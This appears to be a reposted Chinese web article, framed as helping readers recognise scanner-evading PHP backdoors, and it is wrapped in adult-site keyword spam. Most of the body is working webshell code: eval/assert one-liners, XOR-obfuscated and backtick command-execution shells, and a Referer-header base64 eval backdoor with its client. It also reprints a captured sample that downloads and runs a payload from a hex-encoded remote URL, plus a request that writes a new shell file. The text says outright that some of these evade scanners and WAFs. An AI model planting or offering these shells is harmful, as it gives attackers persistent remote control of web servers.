亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 網站 > 建站經驗 > 正文

教你識別簡單的免查殺PHP后門

2024-04-25 20:41:50
字體:
來源:轉載
供稿:網友

一個最常見的一句話后門可能寫作這樣

<?php @eval($_POST['cmd']);?>

或這樣

<?php @assert($_POST['cmd']);?>

tudouya 同學在FREEBUF上給出[一種構造技巧]利用

代碼如下:

<?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _P $__.=("/"^"`"); // _PO $__.=("|"^"/"); // _POS $__.=("{"^"/"); // _POST ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]); ?>

構造生成,當然,嫌太直觀可以寫作這樣

代碼如下:

<?php @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);?>

然后再填充些普通代碼進行偽裝,一個簡單的”免殺”shell樣本就出現了

我們再來看看號稱史上最簡單免查殺php后門

直接上代碼:

<?php

$c=urldecode($_GET['c']);if($c){`$c`;}//完整

!$_GET['c']||`{$_GET['c']}`;//精簡

/*******************************************************

* 原理:PHP中``符號包含會當作系統命令執行

* 示例:http://host/?c=type%20config.php>config.txt

* 然后就可以下載config.txt查看內容了!

* 可以試試更變態的命令,不要干壞事哦!

*******************************************************/

其實現原理就是PHP會直接將 ` 符號(注意:不是單引號)包含的內容解析為系統命令執行!這樣就可以自由變態地擴展了!

再來看同樣很簡單的一段代碼

<?php

preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");

?>

密碼page

近期捕獲一個基于PHP實現的webshell樣本,其巧妙的代碼動態生成方式,猥瑣的自身頁面偽裝手法,讓我們在分析這個樣本的過程中感受到相當多的樂趣。接下來就讓我們一同共賞這個奇葩的Webshell吧。

Webshell代碼如下:

<?php

error_reporting(0);

session_start();

header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))

$_SESSION['api']=substr(file_get_contents(

sprintf('%s?%s',pack("H*",

'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);

@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);

?>

關鍵看下面這句代碼,

代碼如下:

sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

這里執行之后其實是一張圖片,解密出來的圖片地址如下:

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85

然后調用file_get_contents函數讀取圖片為字符串,然后substr取3649字節之后的內容,再調用gzuncompress解壓,得到真正的代碼。最后調用preg_replace的修飾符e來執行惡意代碼的。這里執行以下語句來還原出惡意樣本代碼,

代碼如下:

<?php

echo gzuncompress(substr(file_get_contents(sprintf('%s?%s',pack("H*",

'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649));

?>

無特征隱藏PHP一句話:

<?php

session_start();

$_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]);

$_SESSION [ 'theCode' ]&&preg_replace( '/'a/'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[/'theCode/']))' , 'a' );

?>

將$_POST['code']的內容賦值給$_SESSION['theCode'],然后執行$_SESSION['theCode'],亮點是沒有特征碼。用掃描工具來檢查代碼的話,是不會報警的,達到目的了。

超級隱蔽的PHP后門:

<?php $_GET [a]( $_GET [b]);?>

僅用GET函數就構成了木馬;

利用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

執行后當前目錄生成c.php一句話木馬,當傳參a為eval時會報錯木馬生成失敗,為assert時同樣報錯,但會生成木馬,真可謂不可小視,簡簡單單的一句話,被延伸到這般應用。

層級請求,編碼運行PHP后門:

此方法用兩個文件實現,文件1

<?php

//1.php

header( 'Content-type:text/html;charset=utf-8' );

parse_str ( $_SERVER [ 'HTTP_REFERER' ], $a );

if (reset( $a ) == '10' && count ( $a ) == 9) {

eval ( base64_decode ( str_replace ( " " , "+" , implode( array_slice ( $a , 6)))));

}

?>

文件2

<?php

//2.php

header( 'Content-type:text/html;charset=utf-8' );

//要執行的代碼

$code = <<<CODE

phpinfo();

CODE;

//進行base64編碼

$code = base64_encode ( $code );

//構造referer字符串

$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=" ;

//后門url

$url = 'http://localhost/test1/1.php ' ;

$ch = curl_init();

$options = array (

CURLOPT_URL => $url ,

CURLOPT_HEADER => FALSE,

CURLOPT_RETURNTRANSFER => TRUE,

CURLOPT_REFERER => $referer

);

curl_setopt_array( $ch , $options );

echocurl_exec( $ch );

?>

通過HTTP請求中的HTTP_REFERER來運行經過base64編碼的代碼,來達到后門的效果,一般waf對referer這些檢測要松一點,或者沒有檢測。用這個思路bypass waf不錯。

我們以一個學習的心態來對待這些PHP后門程序,很多PHP后門代碼讓我們看到程序員們是多么的用心良苦。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
久久久久中文字幕2018| 97视频免费在线看| 亚洲a在线观看| 国产成人一区二区三区小说| 日韩亚洲欧美成人| 亚洲综合第一页| 4438全国成人免费| 国产成人亚洲精品| 欧美疯狂xxxx大交乱88av| 欧美一级片免费在线| 狠狠躁夜夜躁人人爽超碰91| 国产成人精品一区二区在线| 国产午夜精品一区二区三区| 最近中文字幕日韩精品| 欧美成人在线影院| 国产亚洲人成a一在线v站| 日本国产一区二区三区| 日韩暖暖在线视频| 久久艹在线视频| 国产精品69精品一区二区三区| 国产日产久久高清欧美一区| 欧美日韩国产一中文字不卡| 亚洲图片欧洲图片av| www.xxxx欧美| 亚洲欧美国产日韩天堂区| 亚洲一区二区中文字幕| 国产成人免费av| 亚洲视频在线观看视频| 热久久这里只有| 日韩成人在线视频| 欧美在线观看网址综合| 亚洲成人精品久久久| 亚洲男人天堂古典| 亚洲欧美一区二区精品久久久| 中文国产成人精品久久一| 久久香蕉国产线看观看网| 中文字幕一精品亚洲无线一区| 日韩激情视频在线播放| 亚洲欧美国产精品| 成人性生交大片免费观看嘿嘿视频| 色婷婷综合久久久久| 久久精品91久久久久久再现| 亚洲视频第一页| 91精品国产高清自在线| 久久久久久69| 精品国产欧美成人夜夜嗨| 色一情一乱一区二区| 成人性生交大片免费观看嘿嘿视频| 黄网动漫久久久| 91情侣偷在线精品国产| 亚洲精品videossex少妇| 亚洲欧美日韩一区在线| 亚洲国产97在线精品一区| 国产精品久久色| 在线播放日韩av| 久久久免费av| 国产精品丝袜高跟| 91精品国产自产91精品| 亚洲第五色综合网| 亚洲片国产一区一级在线观看| 国产精品视频区1| 亚洲欧美中文在线视频| 国产主播精品在线| 欧美性猛交99久久久久99按摩| 这里只有精品久久| 欧美午夜影院在线视频| 国产精品视频公开费视频| 在线日韩中文字幕| 亚洲国产精品资源| 欧美成人精品三级在线观看| 亚洲国产精品悠悠久久琪琪| 欧美中文字幕在线播放| 91免费欧美精品| 一区二区三区黄色| 黑人巨大精品欧美一区免费视频| 国产精品成久久久久三级| 欧美成人免费一级人片100| 国产精品亚洲美女av网站| 国产精品久久久久久亚洲影视| 青青草国产精品一区二区| 亚洲免费一级电影| 影音先锋日韩有码| 成人激情在线观看| 久久亚洲精品国产亚洲老地址| 久久久久久久久综合| 国产精品高潮视频| 九九精品在线视频| 欧美日韩在线免费观看| 国产精品视频中文字幕91| 日韩在线视频观看正片免费网站| 久久99国产精品自在自在app| 久久久久久综合网天天| 国产91色在线|免| 久久视频精品在线| 在线观看欧美成人| 欧美中文字幕精品| 国产欧美日韩精品在线观看| 国产精品视频26uuu| 91精品国产777在线观看| 亚洲成人久久电影| 国产精品自拍偷拍视频| 亚洲人成人99网站| 狠狠躁夜夜躁人人爽超碰91| 中文字幕亚洲综合久久筱田步美| 国产啪精品视频| 日韩电影在线观看免费| 久久久国产精品视频| 富二代精品短视频| 欧美激情精品久久久久久大尺度| 日韩av手机在线看| 国产精品偷伦免费视频观看的| 久久久久www| 青青久久av北条麻妃黑人| 亚洲成人网在线观看| 日韩欧美在线观看视频| 91精品视频网站| 国产aⅴ夜夜欢一区二区三区| 韩日欧美一区二区| 久久精品国产2020观看福利| 精品爽片免费看久久| 久久久噜噜噜久久久| 欧美电影第一页| 欧美日韩中文在线观看| 亚洲精品国偷自产在线99热| 久久精品影视伊人网| 91在线色戒在线| 国产精品国模在线| 久久精品国产清自在天天线| 欧美一级电影免费在线观看| 狠狠久久亚洲欧美专区| 亚洲毛片在线观看| 久久久久久久久久久成人| 国产精品极品尤物在线观看| 在线亚洲国产精品网| 亚洲精品国产精品乱码不99按摩| 亚洲精品福利视频| 国外日韩电影在线观看| 78m国产成人精品视频| 久久精品成人一区二区三区| 欧美猛交ⅹxxx乱大交视频| 午夜精品一区二区三区在线播放| 久久综合国产精品台湾中文娱乐网| 隔壁老王国产在线精品| 欧美性色xo影院| 国产中文字幕亚洲| 国产精品电影久久久久电影网| 日韩精品亚洲视频| 伊人一区二区三区久久精品| 亚洲国产私拍精品国模在线观看| 麻豆国产va免费精品高清在线| 成人a在线观看| 91视频免费网站| 一区二区三欧美| 成人亲热视频网站| 欧美激情女人20p| 国产亚洲欧美另类中文| 亚洲人成网7777777国产| 亚洲精品视频二区| 久久久久久久97| 91中文精品字幕在线视频| 中文字幕欧美专区| 91在线免费观看网站| 久久伊人精品天天| 久久久久久国产三级电影|